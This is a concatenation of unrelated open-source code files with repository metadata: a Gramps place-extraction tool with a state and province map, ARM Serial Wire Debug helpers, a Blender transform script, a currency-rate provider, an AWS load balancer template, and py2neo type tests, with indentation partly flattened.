u"NEVADA" : (u"Nevada" , 0),
u"NH" : (u"New Hampshire" , 0),
u"NH." : (u"New Hampshire" , 0),
u"N.H." : (u"New Hampshire" , 0),
u"NEW HAMPSHIRE" : (u"New Hampshire" , 0),
u"NJ" : (u"New Jersey" , 0),
u"NJ." : (u"New Jersey" , 0),
u"N.J." : (u"New Jersey" , 0),
u"NEW JERSEY" : (u"New Jersey" , 0),
u"NM" : (u"New Mexico" , 0),
u"NM." : (u"New Mexico" , 0),
u"NEW MEXICO" : (u"New Mexico" , 0),
u"NY" : (u"New York" , 0),
u"N.Y." : (u"New York" , 0),
u"NY." : (u"New York" , 0),
u"NEW YORK" : (u"New York" , 0),
u"NC" : (u"North Carolina" , 0),
u"NC." : (u"North Carolina" , 0),
u"N.C." : (u"North Carolina" , 0),
u"NORTH CAROLINA": (u"North Carolina" , 0),
u"ND" : (u"North Dakota" , 0),
u"ND." : (u"North Dakota" , 0),
u"N.D." : (u"North Dakota" , 0),
u"NORTH DAKOTA" : (u"North Dakota" , 0),
u"OH" : (u"Ohio" , 0),
u"OH." : (u"Ohio" , 0),
u"OHIO" : (u"Ohio" , 0),
u"OK" : (u"Oklahoma" , 0),
u"OKLA" : (u"Oklahoma" , 0),
u"OKLA." : (u"Oklahoma" , 0),
u"OK." : (u"Oklahoma" , 0),
u"OKLAHOMA" : (u"Oklahoma" , 0),
u"OR" : (u"Oregon" , 0),
u"OR." : (u"Oregon" , 0),
u"OREGON" : (u"Oregon" , 0),
u"PA" : (u"Pennsylvania" , 0),
u"PA." : (u"Pennsylvania" , 0),
u"PENNSYLVANIA" : (u"Pennsylvania" , 0),
u"PR" : (u"Puerto Rico" , 0),
u"PUERTO RICO" : (u"Puerto Rico" , 0),
u"RI" : (u"Rhode Island" , 0),
u"RI." : (u"Rhode Island" , 0),
u"R.I." : (u"Rhode Island" , 0),
u"RHODE ISLAND" : (u"Rhode Island" , 0),
u"SC" : (u"South Carolina" , 0),
u"SC." : (u"South Carolina" , 0),
u"S.C." : (u"South Carolina" , 0),
u"SOUTH CAROLINA": (u"South Carolina" , 0),
u"SD" : (u"South Dakota" , 0),
u"SD." : (u"South Dakota" , 0),
u"S.D." : (u"South Dakota" , 0),
u"SOUTH DAKOTA" : (u"South Dakota" , 0),
u"TN" : (u"Tennessee" , 0),
u"TN." : (u"Tennessee" , 0),
u"TENNESSEE" : (u"Tennessee" , 0),
u"TENN." : (u"Tennessee" , 0),
u"TENN" : (u"Tennessee" , 0),
u"TX" : (u"Texas" , 0),
u"TX." : (u"Texas" , 0),
u"TEXAS" : (u"Texas" , 0),
u"UT" : (u"Utah" , 0),
u"UT." : (u"Utah" , 0),
u"UTAH" : (u"Utah" , 0),
u"VT" : (u"Vermont" , 0),
u"VT." : (u"Vermont" , 0),
u"VERMONT" : (u"Vermont" , 0),
u"VI" : (u"Virgin Islands" , 0),
u"VIRGIN ISLANDS": (u"Virgin Islands" , 0),
u"VA" : (u"Virginia" , 0),
u"VA." : (u"Virginia" , 0),
u"VIRGINIA" : (u"Virginia" , 0),
u"WA" : (u"Washington" , 0),
u"WA." : (u"Washington" , 0),
u"WASHINGTON" : (u"Washington" , 0),
u"WV" : (u"West Virginia" , 0),
u"WV." : (u"West Virginia" , 0),
u"W.V." : (u"West Virginia" , 0),
u"WEST VIRGINIA" : (u"West Virginia" , 0),
u"WI" : (u"Wisconsin" , 0),
u"WI." : (u"Wisconsin" , 0),
u"WISCONSIN" : (u"Wisconsin" , 0),
u"WY" : (u"Wyoming" , 0),
u"WY." : (u"Wyoming" , 0),
u"WYOMING" : (u"Wyoming" , 0),
u"AB" : (u"Alberta", 1),
u"AB." : (u"Alberta", 1),
u"ALBERTA" : (u"Alberta", 1),
u"BC" : (u"British Columbia", 1),
u"BC." : (u"British Columbia", 1),
u"B.C." : (u"British Columbia", 1),
u"MB" : (u"Manitoba", 1),
u"MB." : (u"Manitoba", 1),
u"MANITOBA" : (u"Manitoba", 1),
u"NB" : (u"New Brunswick", 1),
u"N.B." : (u"New Brunswick", 1),
u"NB." : (u"New Brunswick", 1),
u"NEW BRUNSWICK" : (u"New Brunswick", 1),
u"NL" : (u"Newfoundland and Labrador", 1),
u"NL." : (u"Newfoundland and Labrador", 1),
u"N.L." : (u"Newfoundland and Labrador", 1),
u"NEWFOUNDLAND" : (u"Newfoundland and Labrador", 1),
u"NEWFOUNDLAND AND LABRADOR" : (u"Newfoundland and Labrador", 1),
u"LABRADOR" : (u"Newfoundland and Labrador", 1),
u"NT" : (u"Northwest Territories", 1),
u"NT." : (u"Northwest Territories", 1),
u"N.T." : (u"Northwest Territories", 1),
u"NORTHWEST TERRITORIES" : (u"Northwest Territories", 1),
u"NS" : (u"Nova Scotia", 1),
u"NS." : (u"Nova Scotia", 1),
u"N.S." : (u"Nova Scotia", 1),
u"NOVA SCOTIA" : (u"Nova Scotia", 1),
u"NU" : (u"Nunavut", 1),
u"NU." : (u"Nunavut", 1),
u"NUNAVUT" : (u"Nunavut", 1),
u"ON" : (u"Ontario", 1),
u"ON." : (u"Ontario", 1),
u"ONTARIO" : (u"Ontario", 1),
u"PE" : (u"Prince Edward Island", 1),
u"PE." : (u"Prince Edward Island", 1),
u"PRINCE EDWARD ISLAND" : (u"Prince Edward Island", 1),
u"QC" : (u"Quebec", 1),
u"QC." : (u"Quebec", 1),
u"QUEBEC" : (u"Quebec", 1),
u"SK" : (u"Saskatchewan", 1),
u"SK." : (u"Saskatchewan", 1),
u"SASKATCHEWAN" : (u"Saskatchewan", 1),
u"YT" : (u"Yukon", 1),
u"YT." : (u"Yukon", 1),
u"YUKON" : (u"Yukon", 1),
u"ALSACE" : (u"Alsace", 2),
u"ALS" : (u"ALS-Alsace", 2),
u"AQUITAINE" : (u"Aquitaine", 2),
u"AQU" : (u"AQU-Aquitaine", 2),
u"AUVERGNE" : (u"Auvergne", 2),
u"AUV" : (u"AUV-Auvergne", 2),
u"BOURGOGNE" : (u"Bourgogne", 2),
u"BOU" : (u"BOU-Bourgogne", 2),
u"BRETAGNE" : (u"Bretagne", 2),
u"BRE" : (u"BRE-Bretagne", 2),
u"CENTRE" : (u"Centre - Val de Loire", 2),
u"CEN" : (u"CEN-Centre - Val de Loire", 2),
u"CHAMPAGNE" : (u"Champagne-Ardennes", 2),
u"CHA" : (u"CHA-Champagne-Ardennes", 2),
u"CORSE" : (u"Corse", 2),
u"COR" : (u"COR-Corse", 2),
u"FRANCHE-COMTE" : (u"Franche-Comté", 2),
u"FCO" : (u"FCO-Franche-Comté", 2),
u"ILE DE FRANCE" : (u"Ile de France", 2),
u"IDF" : (u"IDF-Ile de France", 2),
u"LIMOUSIN" : (u"Limousin", 2),
u"LIM" : (u"LIM-Limousin", 2),
u"LORRAINE" : (u"Lorraine", 2),
u"LOR" : (u"LOR-Lorraine", 2),
u"LANGUEDOC" : (u"Languedoc-Roussillon", 2),
u"LRO" : (u"LRO-Languedoc-Roussillon", 2),
u"MIDI PYRENEE" : (u"Midi-Pyrénée", 2),
u"MPY" : (u"MPY-Midi-Pyrénée", 2),
u"HAUTE NORMANDIE": (u"Haute Normandie", 2),
u"NOH" : (u"NOH-Haute Normandie", 2),
u"BASSE NORMANDIE": (u"Basse Normandie", 2),
u"NOB" : (u"NOB-Basse Normandie", 2),
u"NORD PAS CALAIS": (u"Nord-Pas de Calais", 2),
u"NPC" : (u"NPC-Nord-Pas de Calais", 2),
u"PROVENCE" : (u"Provence-Alpes-Côte d'Azur", 2),
u"PCA" : (u"PCA-Provence-Alpes-Côte d'Azur", 2),
u"POITOU-CHARENTES": (u"Poitou-Charentes", 2),
u"PCH" : (u"PCH-Poitou-Charentes", 2),
u"PAYS DE LOIRE" : (u"Pays de Loire", 2),
u"PDL" : (u"PDL-Pays de Loire", 2),
u"PICARDIE" : (u"Picardie", 2),
u"PIC" : (u"PIC-Picardie", 2),
u"RHONE-ALPES" : (u"Rhône-Alpes", 2),
u"RAL" : (u"RAL-Rhône-Alpes", 2),
u"AOM" : (u"AOM-Autres Territoires d'Outre-Mer", 2),
u"COM" : (u"COM-Collectivité Territoriale d'Outre-Mer", 2),
u"DOM" : (u"DOM-Départements d'Outre-Mer", 2),
u"TOM" : (u"TOM-Territoires d'Outre-Mer", 2),
u"GUA" : (u"GUA-Guadeloupe", 2),
u"GUADELOUPE" : (u"Guadeloupe", 2),
u"MAR" : (u"MAR-Martinique", 2),
u"MARTINIQUE" : (u"Martinique", 2),
u"GUY" : (u"GUY-Guyane", 2),
u"GUYANE" : (u"Guyane", 2),
u"REU" : (u"REU-Réunion", 2),
u"REUNION" : (u"Réunion", 2),
u"MIQ" : (u"MIQ-Saint-Pierre et Miquelon", 2),
u"MIQUELON" : (u"Saint-Pierre et Miquelon", 2),
u"MAY" : (u"MAY-Mayotte", 2),
u"MAYOTTE" : (u"Mayotte", 2),
u"(A)" : (u"Stockholms stad", 3),
u"(AB)" : (u"Stockholms stad/län", 3),
u"(B)" : (u"Stockholms län", 3),
u"(C)" : (u"Uppsala län", 3),
u"(D)" : (u"Södermanlands län", 3),
u"(E)" : (u"Östergötlands län", 3),
u"(F)" : (u"Jönköpings län", 3),
u"(G)" : (u"Kronobergs län", 3),
u"(H)" : (u"Kalmar län", 3),
u"(I)" : (u"Gotlands län", 3),
u"(K)" : (u"Blekinge län", 3),
u"(L)" : (u"Kristianstads län", 3),
u"(M)" : (u"Malmöhus län", 3),
u"(N)" : (u"Hallands län", 3),
u"(O)" : (u"Göteborgs- och Bohuslän", 3),
u"(P)" : (u"Älvsborgs län", 3),
u"(R)" : (u"Skaraborg län", 3),
u"(S)" : (u"Värmlands län", 3),
u"(T)" : (u"Örebro län", 3),
u"(U)" : (u"Västmanlands län", 3),
u"(W)" : (u"Kopparbergs län", 3),
u"(X)" : (u"Gävleborgs län", 3),
u"(Y)" : (u"Västernorrlands län", 3),
u"(AC)" : (u"Västerbottens län", 3),
u"(BD)" : (u"Norrbottens län", 3),
}
COLS = [
(_('Place title'), 1),
(_('City'), 2),
(_('State'), 3),
(_('ZIP/Postal Code'), 4),
(_('Country'), 5)
]
#-------------------------------------------------------------------------
#
# ExtractCity
#
#-------------------------------------------------------------------------
class ExtractCity(tool.BatchTool, ManagedWindow):
"""
    Extracts city, state, and zip code information from a place description
if the title is empty and the description falls into the category of:
New York, NY 10000
Sorry for those not in the US or Canada. I doubt this will work for any
other locales.
    Works for Sweden if the description looks like
    Stockholm (A)
    where the letter A is the abbreviation for the län.
Works for France if the description is like
Paris, IDF 75000, FRA
or Paris, ILE DE FRANCE 75000, FRA
"""
def __init__(self, dbstate, uistate, options_class, name, callback=None):
self.label = _('Extract Place data')
ManagedWindow.__init__(self, uistate, [], self.__class__)
self.set_window(Gtk.Window(), Gtk.Label(), '')
tool.BatchTool.__init__(self, dbstate, options_class, name)
if not self.fail:
uistate.set_busy_cursor(True)
self.run(dbstate.db)
uistate.set_busy_cursor(False)
def run(self, db):
"""
Performs the actual extraction of information
"""
self.progress = ProgressMeter(_('Checking Place Titles'), '')
self.progress.set_pass(_('Looking for place fields'),
self.db.get_number_of_places())
self.name_list = []
for place in db.iter_places():
descr = place.get_title()
loc = place.get_main_location()
self.progress.step()
if loc.get_street() == loc.get_city() == \
loc.get_state() == loc.get_postal_code() == "":
match = CITY_STATE_ZIP.match(descr.strip())
if match:
data = match.groups()
city = data[0]
state = data[2]
postal = data[5]
val = " ".join(state.strip().split()).upper()
if state:
new_state = STATE_MAP.get(val.upper())
if new_state:
self.name_list.append(
(place.handle, (city, new_state[0], postal,
COUNTRY[new_state[1]])))
continue
                # Check if there is a left parenthesis in the string; it might be a Swedish län.
match = CITY_LAEN.match(descr.strip().replace(","," "))
if match:
data = match.groups()
city = data[0]
state = '(' + data[1] + ')'
postal = None
val = " ".join(state.strip().split()).upper()
if state:
new_state = STATE_MAP.get(val.upper())
if new_state:
self.name_list.append(
(place.handle, (city, new_state[0], postal,
COUNTRY[new_state[1]])))
continue
match = CITY_STATE.match(descr.strip())
if match:
data = match.groups()
city = data[0]
state = data[1]
postal = None
if state:
m0 = STATE_ZIP.match(state)
if m0:
(state, postal) = m0.groups()
val = " ".join(state.strip().split()).upper()
if state:
new_state = STATE_MAP.get(val.upper())
if new_state:
self.name_list.append(
(place.handle, (city, new_state[0], postal,
COUNTRY[new_state[1]])))
continue
val = " ".join(descr.strip().split()).upper()
new_state = STATE_MAP.get(val)
if new_state:
self.name_list.append(
(place.handle, (None, new_state[0], None,
COUNTRY[new_state[1]])))
self.progress.close()
if self.name_list:
self.display()
else:
self.close()
from gramps.gui.dialog import OkDialog
OkDialog(_('No modifications made'),
_("No place information could be extracted."))
def display(self):
self.top = Glade("changenames.glade")
window = self.top.toplevel
self.top.connect_signals({
"destroy_passed_object" : self.close,
"on_ok_clicked" : self.on_ok_clicked,
"on_help_clicked" : self.on_help_clicked,
"on_delete_event" : self.close,
})
self.list = self.top.get_object("list")
self.set_window(window, self.top.get_object('title'), self.label)
lbl = self.top.get_object('info')
lbl.set_line_wrap(True)
lbl.set_text(
_('Below is a list of Places with the possible data that can '
'be extracted from the place title. Select the places you '
'wish Gramps to convert.'))
self.model = Gtk.ListStore(GObject.TYPE_BOOLEAN, GObject.TYPE_STRING,
GObject.TYPE_STRING, GObject.TYPE_STRING,
GObject.TYPE_STRING, GObject.TYPE_STRING,
GObject.TYPE_STRING)
r = Gtk.CellRendererToggle()
r.connect('toggled', self.toggled)
c = Gtk.TreeViewColumn(_('Select'), r, active=0)
self.list.append_column(c)
for (title, col) in COLS:
render = Gtk.CellRendererText()
if col > 1:
render.set_property('editable', True)
render.connect('edited', self.__change_name, col)
self.list.append_column(
Gtk.TreeViewColumn(title, render, text=col))
self.list.set_model(self.model)
self.iter_list = []
self.progress.set_pass(_('Building display'), len(self.name_list))
for (id, data) in self.name_list:
place = self.db.get_place_from_handle(id)
descr = place.get_title()
handle = self.model.append()
self.model.set_value(handle, 0, True)
self.model.set_value(handle, 1, descr)
if data[0]:
self.model.set_value(handle, 2, data[0])
if data[1]:
self.model.set_value(handle, 3, data[1])
if data[2]:
self.model.set_value(handle, 4, data[2])
if data[3]:
self.model.set_value(handle, 5, data[3])
self.model.set_value(handle, 6, id)
self.iter_list.append(handle)
self.progress.step()
self.progress.close()
self.show()
def __change_name(self, text, path, new_text, col):
self.model[path][col] = new_text
return
def toggled(self, cell, path_string):
path = tuple(map(int, path_string.split(':')))
row = self.model[path]
row[0] = not row[0]
def build_menu_names(self, obj):
return (self.label, None)
def on_help_clicked(self, obj):
"""Display the relevant portion of GRAMPS manual"""
display_help()
def on_ok_clicked(self, obj):
with DbTxn(_("Extract Place data"), self.db, batch=True) as self.trans:
self.db.disable_signals()
changelist = [node for node in self.iter_list
if self.model.get_value(node, 0)]
for change in changelist:
row = self.model[change]
place = self.db.get_place_from_handle(row[6])
(city, state, postal, country) = (row[2], row[3], row[4], row[5])
if city:
place.get_main_location().set_city(city)
if state:
place.get_main_location().set_state(state)
if postal:
place.get_main_location().set_postal_code(postal)
if country:
place.get_main_location().set_country(country)
self.db.commit_place(place, self.trans)
self.db.enable_signals()
self.db.request_rebuild()
self.close()
#------------------------------------------------------------------------
#
#
#
#------------------------------------------------------------------------
class ExtractCityOptions(tool.ToolOptions):
"""
Defines options and provides handling interface.
"""
def __init__(self, name, person_id=None):
tool.ToolOptions.__init__(self, name, person_id)
| gpl-2.0 | 1,880,201,087,278,255,900 | 40.255962 | 88 | 0.432139 | false |
hugovincent/pirate-swd | SWDCommon.py | 1 | 4282 | import time
import sys
class DebugPort:
def __init__ (self, swd):
self.swd = swd
# read the IDCODE
# Hugo: according to ARM DDI 0316D we should have 0x2B.. not 0x1B.., but
# 0x1B.. is what upstream used, so leave it in here...
if self.idcode() not in [0x1BA01477, 0x2BA01477]:
print "warning: unexpected idcode"
# power shit up
self.swd.writeSWD(False, 1, 0x54000000)
if (self.status() >> 24) != 0xF4:
print "error powering up system"
sys.exit(1)
# get the SELECT register to a known state
self.select(0,0)
self.curAP = 0
self.curBank = 0
def idcode (self):
return self.swd.readSWD(False, 0)
def abort (self, orunerr, wdataerr, stickyerr, stickycmp, dap):
value = 0x00000000
value = value | (0x10 if orunerr else 0x00)
value = value | (0x08 if wdataerr else 0x00)
value = value | (0x04 if stickyerr else 0x00)
value = value | (0x02 if stickycmp else 0x00)
value = value | (0x01 if dap else 0x00)
self.swd.writeSWD(False, 0, value)
def status (self):
return self.swd.readSWD(False, 1)
def control (self, trnCount = 0, trnMode = 0, maskLane = 0, orunDetect = 0):
value = 0x54000000
value = value | ((trnCount & 0xFFF) << 12)
value = value | ((maskLane & 0x00F) << 8)
value = value | ((trnMode & 0x003) << 2)
value = value | (0x1 if orunDetect else 0x0)
self.swd.writeSWD(False, 1, value)
def select (self, apsel, apbank):
value = 0x00000000
value = value | ((apsel & 0xFF) << 24)
value = value | ((apbank & 0x0F) << 4)
self.swd.writeSWD(False, 2, value)
def readRB (self):
return self.swd.readSWD(False, 3)
def readAP (self, apsel, address):
adrBank = (address >> 4) & 0xF
adrReg = (address >> 2) & 0x3
if apsel != self.curAP or adrBank != self.curBank:
self.select(apsel, adrBank)
self.curAP = apsel
self.curBank = adrBank
return self.swd.readSWD(True, adrReg)
def writeAP (self, apsel, address, data, ignore = False):
adrBank = (address >> 4) & 0xF
adrReg = (address >> 2) & 0x3
if apsel != self.curAP or adrBank != self.curBank:
self.select(apsel, adrBank)
self.curAP = apsel
self.curBank = adrBank
self.swd.writeSWD(True, adrReg, data, ignore)
class MEM_AP:
def __init__ (self, dp, apsel):
self.dp = dp
self.apsel = apsel
self.csw(1,2) # 32-bit auto-incrementing addressing
def csw (self, addrInc, size):
self.dp.readAP(self.apsel, 0x00)
csw = self.dp.readRB() & 0xFFFFFF00
self.dp.writeAP(self.apsel, 0x00, csw + (addrInc << 4) + size)
def idcode (self):
self.dp.readAP(self.apsel, 0xFC)
return self.dp.readRB()
def readWord (self, adr):
self.dp.writeAP(self.apsel, 0x04, adr)
self.dp.readAP(self.apsel, 0x0C)
return self.dp.readRB()
def writeWord (self, adr, data):
self.dp.writeAP(self.apsel, 0x04, adr)
self.dp.writeAP(self.apsel, 0x0C, data)
return self.dp.readRB()
def readBlock (self, adr, count):
self.dp.writeAP(self.apsel, 0x04, adr)
vals = [self.dp.readAP(self.apsel, 0x0C) for off in range(count)]
vals.append(self.dp.readRB())
return vals[1:]
def writeBlock (self, adr, data):
self.dp.writeAP(self.apsel, 0x04, adr)
for val in data:
self.dp.writeAP(self.apsel, 0x0C, val)
def writeBlockNonInc (self, adr, data):
self.csw(0, 2) # 32-bit non-incrementing addressing
self.dp.writeAP(self.apsel, 0x04, adr)
for val in data:
self.dp.writeAP(self.apsel, 0x0C, val)
self.csw(1, 2) # 32-bit auto-incrementing addressing
def writeHalfs (self, adr, data):
self.csw(2, 1) # 16-bit packed-incrementing addressing
self.dp.writeAP(self.apsel, 0x04, adr)
for val in data:
time.sleep(0.001)
self.dp.writeAP(self.apsel, 0x0C, val, ignore = True)
self.csw(1, 2) # 32-bit auto-incrementing addressing
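# Minimal usage sketch (illustrative only, not part of the original module).
# It assumes the companion PirateSWD module from this repository provides a
# PirateSWD transport exposing readSWD/writeSWD, and that a Bus Pirate is
# attached at /dev/ttyUSB0; adjust both assumptions to your setup.
if __name__ == "__main__":
    from PirateSWD import PirateSWD
    debug_port = DebugPort(PirateSWD("/dev/ttyUSB0"))
    mem_ap = MEM_AP(debug_port, 0)
    print "MEM-AP IDCODE: 0x%08X" % mem_ap.idcode()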
| bsd-3-clause | 1,786,803,907,590,919,400 | 34.683333 | 81 | 0.578001 | false |
oscurart/BlenderAddons | oscurart_delta_to_global.py | 1 | 1400 | # ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
# AUTHOR: Eugenio Pignataro (Oscurart) www.oscurart.com.ar
# USAGE: Select an object and run. This script is the inverse of "apply transformations to deltas":
# it moves the delta transformations back into the object's regular transform channels.
import bpy
for ob in bpy.context.selected_objects:
mat = ob.matrix_world
ob.location = mat.to_translation()
ob.delta_location = (0,0,0)
if ob.rotation_mode == "QUATERNION":
ob.rotation_quaternion = mat.to_quaternion()
ob.delta_rotation_quaternion = (1,0,0,0)
else:
ob.rotation_euler = mat.to_euler()
ob.delta_rotation_euler = (0,0,0)
ob.scale = mat.to_scale()
ob.delta_scale = (1,1,1)
| gpl-2.0 | 6,044,060,806,490,240,000 | 35.842105 | 83 | 0.692143 | false |
dorotapalicova/GoldDigger | gold_digger/data_providers/grandtrunk.py | 1 | 2755 | # -*- coding: utf-8 -*-
from datetime import datetime, date
from collections import defaultdict
from ._provider import Provider
class GrandTrunk(Provider):
"""
    Service offers daily exchange rates based on the Federal Reserve and the European Central Bank.
It is currently free for use in low-volume and non-commercial settings.
"""
BASE_URL = "http://currencies.apps.grandtrunk.net"
BASE_CURRENCY = "USD"
name = "grandtrunk"
def get_by_date(self, date_of_exchange, currency):
date_str = date_of_exchange.strftime(format="%Y-%m-%d")
self.logger.debug("Requesting GrandTrunk for %s (%s)", currency, date_str, extra={"currency": currency, "date": date_str})
response = self._get("{url}/getrate/{date}/{from_currency}/{to}".format(
url=self.BASE_URL, date=date_str, from_currency=self.BASE_CURRENCY, to=currency))
if response:
return self._to_decimal(response.text.strip(), currency)
def get_all_by_date(self, date_of_exchange, currencies):
day_rates = {}
for currency in currencies:
response = self._get("{url}/getrate/{date}/{from_currency}/{to}".format(
url=self.BASE_URL, date=date_of_exchange, from_currency=self.BASE_CURRENCY, to=currency))
if response:
decimal_value = self._to_decimal(response.text.strip(), currency)
if decimal_value:
day_rates[currency] = decimal_value
return day_rates
def get_historical(self, origin_date, currencies):
day_rates = defaultdict(dict)
origin_date_string = origin_date.strftime(format="%Y-%m-%d")
for currency in currencies:
response = self._get("{url}/getrange/{from_date}/{to_date}/{from_currency}/{to}".format(
url=self.BASE_URL, from_date=origin_date_string, to_date=date.today(), from_currency=self.BASE_CURRENCY, to=currency
))
records = response.text.strip().split("\n") if response else []
for record in records:
record = record.rstrip()
if record:
try:
date_string, exchange_rate_string = record.split(" ")
day = datetime.strptime(date_string, "%Y-%m-%d")
except ValueError as e:
self.logger.error("%s - Parsing of rate&date on record '%s' failed: %s" % (self, record, e))
continue
decimal_value = self._to_decimal(exchange_rate_string, currency)
if decimal_value:
day_rates[day][currency] = decimal_value
return day_rates
def __str__(self):
return self.name
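# Illustrative sketch (not used by the application): the raw request pattern
# that get_by_date() wraps. It uses the third-party requests package, needs
# network access to the public GrandTrunk endpoint, and the date and currency
# pair below are arbitrary example values.
if __name__ == "__main__":
    import requests
    url = "{url}/getrate/{date}/{from_currency}/{to}".format(
        url=GrandTrunk.BASE_URL, date="2016-01-15", from_currency="USD", to="EUR")
    print(requests.get(url).text.strip())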
| apache-2.0 | 8,640,422,715,685,752,000 | 45.694915 | 132 | 0.587659 | false |
caktus/aws-web-stacks | stack/load_balancer.py | 1 | 4262 | from troposphere import GetAtt, If, Join, Output, Ref
from troposphere import elasticloadbalancing as elb
from . import USE_ECS, USE_GOVCLOUD
from .security_groups import load_balancer_security_group
from .template import template
from .utils import ParameterWithDefaults as Parameter
from .vpc import public_subnet_a, public_subnet_b
# Web worker
if USE_ECS:
web_worker_port = Ref(template.add_parameter(
Parameter(
"WebWorkerPort",
Description="Web worker container exposed port",
Type="Number",
Default="8000",
),
group="Load Balancer",
label="Web Worker Port",
))
else:
# default to port 80 for EC2 and Elastic Beanstalk options
web_worker_port = Ref(template.add_parameter(
Parameter(
"WebWorkerPort",
Description="Default web worker exposed port (non-HTTPS)",
Type="Number",
Default="80",
),
group="Load Balancer",
label="Web Worker Port",
))
web_worker_protocol = Ref(template.add_parameter(
Parameter(
"WebWorkerProtocol",
Description="Web worker instance protocol",
Type="String",
Default="HTTP",
AllowedValues=["HTTP", "HTTPS"],
),
group="Load Balancer",
label="Web Worker Protocol",
))
# Web worker health check
web_worker_health_check_protocol = Ref(template.add_parameter(
Parameter(
"WebWorkerHealthCheckProtocol",
Description="Web worker health check protocol",
Type="String",
Default="TCP",
AllowedValues=["TCP", "HTTP", "HTTPS"],
),
group="Load Balancer",
label="Health Check: Protocol",
))
web_worker_health_check_port = Ref(template.add_parameter(
Parameter(
"WebWorkerHealthCheckPort",
Description="Web worker health check port",
Type="Number",
Default="80",
),
group="Load Balancer",
label="Health Check: Port",
))
web_worker_health_check = Ref(template.add_parameter(
Parameter(
"WebWorkerHealthCheck",
Description="Web worker health check URL path, e.g., \"/health-check\"; "
"required unless WebWorkerHealthCheckProtocol is TCP",
Type="String",
Default="",
),
group="Load Balancer",
label="Health Check: URL",
))
# Web load balancer
listeners = [
elb.Listener(
LoadBalancerPort=80,
InstanceProtocol=web_worker_protocol,
InstancePort=web_worker_port,
Protocol='HTTP',
)
]
if USE_GOVCLOUD:
# configure the default HTTPS listener to pass TCP traffic directly,
# since GovCloud doesn't support the Certificate Manager (this can be
# modified to enable SSL termination at the load balancer via the AWS
# console, if needed)
listeners.append(elb.Listener(
LoadBalancerPort=443,
InstanceProtocol='TCP',
InstancePort=443,
Protocol='TCP',
))
else:
from .certificates import application as application_certificate
from .certificates import cert_condition
listeners.append(If(cert_condition, elb.Listener(
LoadBalancerPort=443,
InstanceProtocol=web_worker_protocol,
InstancePort=web_worker_port,
Protocol='HTTPS',
SSLCertificateId=application_certificate,
), Ref("AWS::NoValue")))
load_balancer = elb.LoadBalancer(
'LoadBalancer',
template=template,
Subnets=[
Ref(public_subnet_a),
Ref(public_subnet_b),
],
SecurityGroups=[Ref(load_balancer_security_group)],
Listeners=listeners,
HealthCheck=elb.HealthCheck(
Target=Join("", [
web_worker_health_check_protocol,
":",
web_worker_health_check_port,
web_worker_health_check,
]),
HealthyThreshold="2",
UnhealthyThreshold="2",
Interval="100",
Timeout="10",
),
CrossZone=True,
)
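# Note (illustrative): the HealthCheck Target above resolves to strings such as
# "TCP:80" for a TCP check, or "HTTP:80/health-check" when an HTTP(S) protocol
# and a health check URL path are supplied.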
template.add_output(Output(
"LoadBalancerDNSName",
Description="Loadbalancer DNS",
Value=GetAtt(load_balancer, "DNSName")
))
template.add_output(Output(
"LoadBalancerHostedZoneID",
Description="Loadbalancer hosted zone",
Value=GetAtt(load_balancer, "CanonicalHostedZoneNameID")
))
| mit | 8,519,122,697,732,304,000 | 27.039474 | 81 | 0.635852 | false |
technige/py2neo | test/integration/test_types.py | 1 | 4086 | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
# Copyright 2011-2021, Nigel Small
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from neotime import Date, Time, DateTime, Duration
from packaging.version import Version
from pytest import skip
from py2neo.data import Node
from py2neo.data.spatial import CartesianPoint, WGS84Point
def test_null(graph):
i = None
o = graph.evaluate("RETURN $x", x=i)
assert o is i
def test_true(graph):
i = True
o = graph.evaluate("RETURN $x", x=i)
assert o is i
def test_false(graph):
i = False
o = graph.evaluate("RETURN $x", x=i)
assert o is i
def test_int(graph):
for i in range(-128, 128):
o = graph.evaluate("RETURN $x", x=i)
assert o == i
def test_float(graph):
for i in range(-128, 128):
f = float(i) + 0.5
o = graph.evaluate("RETURN $x", x=f)
assert o == f
def test_string(graph):
i = u"hello, world"
o = graph.evaluate("RETURN $x", x=i)
assert o == i
def test_bytes(graph):
i = bytearray([65, 66, 67])
o = graph.evaluate("RETURN $x", x=i)
# The values are coerced to bytearray before comparison
# as HTTP does not support byte parameters, instead
# coercing such values to lists of integers.
assert bytearray(o) == bytearray(i)
def test_list(graph):
i = [65, 66, 67]
o = graph.evaluate("RETURN $x", x=i)
assert o == i
def test_dict(graph):
i = {"one": 1, "two": 2}
o = graph.evaluate("RETURN $x", x=i)
assert o == i
def test_node(graph):
i = Node("Person", name="Alice")
o = graph.evaluate("CREATE (a:Person {name: 'Alice'}) RETURN a")
assert o.labels == i.labels
assert dict(o) == dict(i)
def test_relationship(graph):
o = graph.evaluate("CREATE ()-[r:KNOWS {since: 1999}]->() RETURN r")
assert type(o).__name__ == "KNOWS"
assert dict(o) == {"since": 1999}
def test_path(graph):
o = graph.evaluate("CREATE p=(:Person {name: 'Alice'})-[:KNOWS]->(:Person {name: 'Bob'}) RETURN p")
assert len(o) == 1
assert o.start_node.labels == {"Person"}
assert dict(o.start_node) == {"name": "Alice"}
assert type(o.relationships[0]).__name__ == "KNOWS"
assert o.end_node.labels == {"Person"}
assert dict(o.end_node) == {"name": "Bob"}
def skip_if_no_temporal_support(graph):
connector = graph.service.connector
if graph.service.kernel_version < Version("3.4"):
skip("Temporal type tests are only valid for Neo4j 3.4+")
if connector.profile.protocol != "bolt":
skip("Temporal type tests are only valid for Bolt connectors")
def test_date(graph):
skip_if_no_temporal_support(graph)
i = Date(2014, 8, 6)
o = graph.evaluate("RETURN $x", x=i)
assert o == i
def test_time(graph):
skip_if_no_temporal_support(graph)
i = Time(12, 34, 56.789)
